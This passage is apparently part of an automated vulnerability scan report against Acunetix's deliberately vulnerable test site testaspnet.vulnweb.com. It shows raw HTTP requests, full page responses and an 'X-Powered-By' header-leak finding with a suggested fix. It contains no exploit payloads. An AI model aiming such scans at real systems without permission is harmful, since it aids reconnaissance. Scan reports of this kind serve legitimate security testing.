          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        33. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
